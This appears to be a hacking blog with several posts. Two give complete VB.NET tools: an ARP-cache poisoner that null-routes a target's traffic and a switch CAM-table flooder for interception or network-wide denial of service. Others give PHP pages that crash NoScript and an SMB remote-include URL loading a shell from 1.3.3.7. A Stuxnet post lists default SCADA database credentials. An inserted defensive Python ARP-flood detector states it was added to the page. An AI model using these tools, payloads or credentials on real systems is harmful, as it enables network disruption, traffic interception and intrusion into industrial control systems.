Ack Ack
Go beyond the impossible!
Aug 7th
Yeah, you know the deal.
Another network-based attack! This time, a LAND attack (Local Area Network Denial attack).
I know the first thing that comes to your mind is:
“LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone…”
Not so fast.
I’ve actually found this quite useful.
It requires a very small number of packets to null-route a remote computer (remote, as in a computer on the LAN you don’t have physical access to).
Imagine this scenario:
But. What if.
…the administrator is unable to access the logs?
…because his ARP cache tells him the remote logs are on his local computer?
Who’s paranoid then?
This is a PoC of how you can poison the evil administrator’s routes to critical systems (the systems you’re after?) back to himself.
```vbnet
Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.

Module ARP_Land_Attack
    Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
    Private Adapters As New Adapters 'An instance of the NIC-enumeration.
    Private TargetMAC As String 'Target's MAC-address.
    Private TargetIP As Net.IPAddress 'Target's IPv4-address.
    Private NullRoutes As New ArrayList 'List of addresses to disable.

    Private Structure Route
        Dim IP As Net.IPAddress
        Dim MAC As String
    End Structure

    Sub Main()
        ShowNICs()
        ChooseNIC()
        ChooseTarget() 'Who will we attack?
        MakeNullroutes() 'What routes should we attack?
        Nullroute() 'Attack!
    End Sub

    Private Sub ChooseTarget()
        Dim Dummy As String = vbNullString
        Do
            Console.WriteLine()
            Console.WriteLine("< Enter the targets IPv4:")
            Console.Write("> ")
            Dummy = Console.ReadLine
        Loop Until nokitel.Format.IsIPv4(Dummy)
        TargetMAC = nokitel.Parse.ARP.GetMAC(Dummy, NIC.IP)
        TargetIP = nokitel.Format.StringToIPAddress(Dummy)
    End Sub

    Private Sub MakeNullroutes()
        Dim Dummy As String = vbNullString
        Dim ExitSub As Boolean = False
        Console.WriteLine()
        Console.WriteLine("< Write ""start"" to poison the target.")
        Do
            Do
                Console.WriteLine("< Enter an IPv4 to nullroute:")
                Console.Write("> ")
                Dummy = Console.ReadLine
                If Not String.IsNullOrEmpty(Dummy) Then
                    If nokitel.Format.RegexMatch(Dummy, "launch|start|attack|destroy|poison|kill|exterminate") Then
                        ExitSub = True
                        Exit Do
                    End If
                End If
            Loop Until nokitel.Format.IsIPv4(Dummy)
            If ExitSub Then
                If NullRoutes.Count > &H0 Then
                    Exit Do
                Else
                    Console.WriteLine("! Enter atleast one route to poison.")
                    ExitSub = Not ExitSub
                End If
            Else
                Dim Entry As New Route
                With Entry
                    .IP = nokitel.Format.StringToIPAddress(Dummy) 'The IP-address to poison.
                    .MAC = nokitel.Parse.ARP.GetMAC(.IP.ToString, NIC.IP) 'The corresponding MAC-address attached to the IP.
                    If String.IsNullOrEmpty(.MAC) Then .MAC = "00:00:00:00:00:00" 'If the ARP-request fails, we simply make a "blackhole".
                End With
                NullRoutes.Add(Entry) 'Add the route to the stack.
            End If
        Loop
        Console.WriteLine()
    End Sub

    Private Sub Nullroute()
        Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
        Dim ARP As New nokitel.Parse.ARP.ARP
        Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
        Do
            For Each Route As Route In NullRoutes
                With Ethernet
                    .DestinationMAC = TargetMAC
                    .SourceMAC = nokitel.Format.RandomMAC 'Spoof that it's not us. Who knows?
                    .Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
                End With
                With ARP
                    .HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
                    .Operation = nokitel.Parse.ARP.OPCODES.Reply
                    .ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
                    .HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
                    .ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
                    .SenderHardwareAddress = TargetMAC 'Map the route's IP to the target's own MAC-address.
                    .SenderProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
                    .TargetHardwareAddress = Route.MAC
                    .TargetProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
                    Console.WriteLine("Poisoning " & TargetIP.ToString & "'s ARP-Cache ### " & Route.IP.ToString & " -=> " & TargetMAC)
                End With
                nokitel.Parse.Ethernet.Make(Payload, Ethernet) 'Grab the structures and convert them to raw bytes.
                nokitel.Parse.ARP.Make(Payload, ARP)
                NIC.Send(Payload) 'Send the bogus packets!
            Next
            System.Threading.Thread.Sleep(2000) 'Sleep for a while, we don't need to be quick.
        Loop
    End Sub

    Private Sub ShowNICs()
        For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NICs and display their stats:
            With Adapters.Enumurate(Index)
                Console.WriteLine("* ID: " & Index)
                Console.WriteLine("* Name: " & .Name)
                Console.WriteLine("* Description: " & .Description)
                Console.WriteLine("* GUID: " & .GUID)
                Console.WriteLine("* Netmask: " & .Netmask)
                Console.WriteLine("* Destination: " & .DestinationAddress)
                Console.WriteLine("* Broadcast: " & .BroadcastAddress)
                Console.WriteLine("* IP: " & .IP)
                Console.WriteLine("* MAC: " & .MAC)
                Console.WriteLine("* Gateway IP: " & .GatewayIP)
                Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
                Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
            End With
            Console.WriteLine()
        Next
    End Sub

    Private Sub ChooseNIC()
        Dim ID As String = vbNullString
        Do
            Console.Write("> ")
            ID = Console.ReadLine
            If IsNumeric(ID) Then
                If ID >= &H0 And ID < Adapters.Enumurate.Length Then
                    NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
                    If Not NIC.Open(, False) Then
                        Console.WriteLine("x Unable to hook device!")
                        End
                    End If
                    Exit Do
                End If
            End If
        Loop
    End Sub
End Module
```
Yeah, the code is a bit long. Sorry for that.
But I hope you understand the scenario.
Note: His ARP cache gets restored almost instantly after you quit the attack. So no real harm done.
A pre-compiled Win32 executable can be downloaded from here.
And here’s a screenshot of how I nullified my laptop:
Evil isn’t it?
Ciao.
Aug 5th
While NoScript is a great plugin for making your browser more secure, I tried finding ways to break it and succeeded.
This means that it is possible to break the browser client-side while NoScript is enabled (and the site(s) are disallowed).
I did not fully debug the bugs because I am not in the mood to find browser exploits, but I was trying to find ways to disable/crash the browser client-side with NoScript enabled; crashes were enough for me.
My first idea to break it was making a very, very long URL; this is the code I used:
```php
<?php
// Emit a single <script> tag whose src is a URL roughly half a million characters long.
echo "<script src=\"http://";
for ($a = 95000; $a >= 0; $a--) {
    echo $a;
}
echo "\">";
?>
```
First it loads normally; it gives a message that 1 script is blocked. No crash was found here yet.
Then when I told it to temporarily allow the site, Firefox kept running, no sandbox stopped me, and it kept eating my CPU; I waited some minutes before I killed Firefox.

Alright, time for the second attempt: let’s make tons of scripts to different locations to make it crash.
```php
<?php
// Emit 95001 <script> tags, each pointing at a different host.
for ($a = 95000; $a >= 0; $a--) {
    echo "<script src=\"http://" . $a . "\"></script>";
}
?>
```
When you click the NoScript button now, it will attempt to make a drop-down list of all sites; sometimes you will get a screen like this:
And sometimes it will just crash the browser. When you get the pop-up and you make it stop, it will show an empty drop-down menu.
Another idea was to make a script tag pointing at a very long port number. This did not crash the browser but gave unexpected behavior: it would not ask to allow the script from that page but told me the script was hosted on localhost. Pretty weird; unfortunately I cannot host something on a port number with 1000 digits to fully test this vulnerability.
I think NoScript also understands that high port numbers do not exist, or something.
After a lot of trying I noticed I had entirely disabled the protection suite somehow; I was able to do XSS and such. I don’t know why or how, and I investigated where it came from, but somehow I made NoScript allow XSS and other attack vectors after allowing a website. There are also a lot of different errors you will get when playing with this, so I must have triggered something accidentally; after the reboot everything was fine.
There is a funny thing with the script which generates a lot of links: try this out and it will generate an empty warning box which you can repeatedly close, but it will come back every time. First you will get a problem in the policy.js script, but it doesn’t matter what you click there; your browser will be doomed anyway. Here is a screenshot of it:

Anyhow, if you manage to narrow it down then let me know; it’s pretty severe if you can just strip the protection. If I find the specific way then I will also tell you, of course.
I also tested it on different operating systems, and the results and errors were different.
Aug 1st
Hey! Remember the good old days when the web spouted RFIs everywhere?
We miss those days.
So Fredrik and I figured out a new way to reincarnate the old dusty RFIs!
This is an unexpected feature in PHP that allows you to communicate with external servers even though allow_url_include = Off.
We eventually played around with an RFI playground we made and found out SMB is supported.
So what? SMB is only for internal networks?
Not so fast! If an attacker writes a rogue SMB server, just like Jelmer did in the “MySQL Network Exploitation Toolkit”, he could remotely load a shell or send back a malicious payload to exploit one of the many vulnerabilities against Samba.
This will obviously require an RFI “patch” relying on allow_url_include on the server.
vulnerable.php:
```php
...
// The classic unfiltered include: the file parameter is taken straight from the query string.
if (isset($_GET['file']))
{
    include($_GET['file']);
}
...
```
Example URL:
http://www.vulnerablesite.com/includefile.php?file=\\1.3.3.7\shell.txt%00
And that’s how you may turn an LFI into an RFI using SMB.
Note: This is still a theory, no PoC available yet.
Ciao bella!
Jul 31st
Here comes another example of how nokitel can be used for penetration testing.
Ever heard about a CAM-Table-Overflow?
Thought so.
It’s not a very common exploitation method.
This is a short description quoted from hakipedia.com:
“A switch’s CAM table contains network information such as MAC addresses available on physical switch ports and associated VLAN parameters. CAM Table Overflows occur when an influx of MAC addresses are flooded into the table and the CAM table threshold is reached. This causes the switch to act like a hub, flooding the network with traffic out all ports. The flooding caused by a CAM Table Overflow is limited to the source VLAN, thus does not affect other VLANs on the network.”
In short; a CAM-Table-Overflow against a switch results in a “degradation of service“.
The switch gets downgraded into a hub, and stays that way as long as the CAM-table keeps being overflowed.
If the MAC flood stops, the degradation will stop as well after a short period of time.
It will eventually turn back into a fully operational mode due to nifty timeouts.
So what’s this “degradation of service” good for?
Well, a normal switch forwards traffic only to the port it belongs on. Period.
A hub (which the attack turns the switch into) broadcasts all traffic to every physical port.
And what’s so bad about that?
You got it. MITM! (Man-In-The-Middle)

CAM-Table-Overflow From Hakipedia.com
The cool thing about this attack is that the affected devices (boxes, printers, other routers, etc.) won’t get their ARP caches tampered with.
Which in turn lowers the risk of firewalls noticing.
Clever huh?
…And here comes the PoC, written in VB.NET using the nokitel library:
```vbnet
Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.

Module ARP_CAM_Table_Overflow
    Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
    Private Adapters As New Adapters 'An instance of the NIC-enumeration.

    Sub Main()
        ShowNICs()
        ChooseNIC()
        Console.WriteLine("! FF:FF:FF:FF:FF:FF, is the broadcast MAC-address.")
        Dim Target As String = vbNullString
        Do
            Console.WriteLine("< Enter the targets MAC:")
            Console.Write("> ")
            Target = Console.ReadLine
        Loop Until nokitel.Format.RegexMatch(Target, "^(([A-F0-9]){2}:){5}([A-F0-9]){2}$")
        Dim Threshold As Integer = &H0
        Do
            Console.WriteLine("< Enter the numeric timeout in milliseconds:")
            Console.Write("> ")
            Dim Dummy As String = Console.ReadLine
            If IsNumeric(Dummy) Then
                Threshold = CInt(Dummy)
                Exit Do
            End If
        Loop
        Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
        Dim ARP As New nokitel.Parse.ARP.ARP
        Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
        Do
            With Ethernet
                .DestinationMAC = Target
                .SourceMAC = nokitel.Format.RandomMAC 'A fresh source MAC for every frame fills the CAM table.
                .Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
            End With
            With ARP
                .HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
                .Operation = nokitel.Parse.ARP.OPCODES.Reply
                .ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
                .HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
                .ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
                .SenderHardwareAddress = nokitel.Format.RandomMAC
                .SenderProtocolAddress = nokitel.Format.RandomIP
                .TargetHardwareAddress = nokitel.Format.RandomMAC
                .TargetProtocolAddress = nokitel.Format.RandomIP
            End With
            nokitel.Parse.Ethernet.Make(Payload, Ethernet)
            nokitel.Parse.ARP.Make(Payload, ARP)
            NIC.Send(Payload)
            If Threshold > &H0 Then System.Threading.Thread.Sleep(Threshold)
        Loop
    End Sub

    Private Sub ShowNICs()
        For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NICs and display their stats:
            With Adapters.Enumurate(Index)
                Console.WriteLine("* ID: " & Index)
                Console.WriteLine("* Name: " & .Name)
                Console.WriteLine("* Description: " & .Description)
                Console.WriteLine("* GUID: " & .GUID)
                Console.WriteLine("* Netmask: " & .Netmask)
                Console.WriteLine("* Destination: " & .DestinationAddress)
                Console.WriteLine("* Broadcast: " & .BroadcastAddress)
                Console.WriteLine("* IP: " & .IP)
                Console.WriteLine("* MAC: " & .MAC)
                Console.WriteLine("* Gateway IP: " & .GatewayIP)
                Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
                Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
            End With
            Console.WriteLine()
        Next
    End Sub

    Private Sub ChooseNIC()
        Dim ID As String = vbNullString
        Do
            Console.Write("> ")
            ID = Console.ReadLine
            If IsNumeric(ID) Then
                If ID >= &H0 And ID < Adapters.Enumurate.Length Then
                    NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
                    If Not NIC.Open(, False) Then
                        Console.WriteLine("x Unable to hook device!")
                        End
                    End If
                    Exit Do
                End If
            End If
        Loop
    End Sub
End Module
```
There you go!
A precompiled library can be downloaded from here. (Don’t forget to set the “target MAC-address” to the switch’s!)

CAM Table Overflow
I might add: if you set the threshold to 0 and enter the MAC address “FF:FF:FF:FF:FF:FF” (broadcast), it will turn into a devastating DoS (Denial of Service).
When I first coded this, I let Kasper try it out.
…And to put it short, it killed his whole network.
The Microsoft Windows Vista boxes in his network got null-routed, even after a few reboots and cleared ARP-caches.
…so did his TV.
Enough of this now!
It would be cool if you tried tinkering around with it!
That’s about it!
Ciao.
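A defender’s counterpart to the two nokitel PoCs on this page (the nullroute poisoner further up and the CAM-table flooder just above), added here and not code from the original posts or from the nokitel library. It parses raw Ethernet/ARP frames and flags what each PoC leaves on the wire: an ARP reply mapping another host’s IP to the monitored host’s own MAC, an Ethernet source that disagrees with the ARP sender field, and a burst of distinct source MACs. MONITOR_MAC, MONITOR_IP and the flood thresholds are constructed values, and build_arp only fabricates test frames.

```python
import struct
from collections import deque

MONITOR_MAC = "00:11:22:33:44:55"  # constructed: MAC of the host being defended
MONITOR_IP = "10.0.0.7"            # constructed: its IPv4 address
FLOOD_WINDOW, FLOOD_LIMIT = 10, 6  # alert when >= 6 distinct source MACs in 10 frames

def _mac(b): return ":".join(f"{x:02x}" for x in b)
def _ip(b): return ".".join(str(x) for x in b)

def parse_frame(frame):
    """Ethernet header + ARP body (42 bytes); None for anything that is not ARP."""
    if len(frame) < 42:
        return None
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    if etype != 0x0806:
        return None
    _ht, _pt, _hl, _pl, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"dst": _mac(dst), "src": _mac(src), "op": op, "sha": _mac(sha),
            "spa": _ip(spa), "tha": _mac(tha), "tpa": _ip(tpa)}

class ArpMonitor:
    def __init__(self):
        self.recent = deque(maxlen=FLOOD_WINDOW)  # Ethernet source MAC of the last N frames
    def inspect(self, frame):
        """Return a list of alert strings for one captured frame (empty if clean)."""
        alerts = []
        a = parse_frame(frame)
        if a is None:
            return alerts
        # Nullroute PoC: a reply mapping some OTHER host's IP to our own MAC, so the
        # victim talks to itself. A gratuitous ARP for our own IP is left alone.
        if a["op"] == 2 and a["sha"] == MONITOR_MAC and a["spa"] != MONITOR_IP:
            alerts.append(f"self-route poisoning: {a['spa']} claimed at our MAC")
        # Both PoCs randomise the Ethernet source; a real stack keeps it equal to SHA.
        if a["src"] != a["sha"]:
            alerts.append(f"ethernet src {a['src']} != ARP sender {a['sha']}")
        # CAM-overflow PoC: a fresh random source MAC on every frame.
        self.recent.append(a["src"])
        if len(self.recent) == FLOOD_WINDOW and len(set(self.recent)) >= FLOOD_LIMIT:
            alerts.append(f"MAC flood: {len(set(self.recent))} source MACs in {FLOOD_WINDOW} frames")
        return alerts

def build_arp(dst, src, op, sha, spa, tha, tpa):
    """Build a constructed test frame in the 42-byte layout parse_frame expects."""
    m = lambda s: bytes(int(x, 16) for x in s.split(":"))
    i = lambda s: bytes(int(x) for x in s.split("."))
    return (struct.pack("!6s6sH", m(dst), m(src), 0x0806)
            + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op, m(sha), i(spa), m(tha), i(tpa)))
```

Feed it frames from any capture library that hands back raw bytes; on a real network, tune FLOOD_LIMIT to the number of stations you expect to see per window.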
Jul 30th
I had a hard time finding the Stuxnet-rootkit and the credentials it used to exploit the Siemens WINCC6 SCADA system.
So here you go, here’s the default credentials it used towards the WINCC6’s MSSQL Server:
Username: WinCCConnect
Password: 2WSXcder
Username: WinCCAdmin
Password: 2WSXcde.
Just for documentation.
The odds for you to stumble upon one of these systems are low.
So no harm done here! I just want it to be easier for other people who are searching for this information.
Oh, and I might add, the rootkit is stored at:
%SystemRoot%\Windows32\drivers\mrxcls.sys
…and here:
%SystemRoot%\Windows32\drivers\mrxnet.sys
Another way to detect its presence is to look for the odd Windows services “MRxCls” and “MRxNet”.
It also creates two registry entries at:
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls
…and:
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet
It spreads using a previously unknown security flaw in the Microsoft Windows .LNK file-extension with the use of USB-sticks.
More information about the 0-day can be found here.
That’s it. What more information do you need if you wish to code an anti-virus for this specific worm?
Oh yeah. Both the “drivers” are signed by RealTek Semiconductor Corp. Might be something to look out for as well.
It’s a pretty clever example of how dangerous malware can be when used for industrial espionage.
Anyway,
Ciao.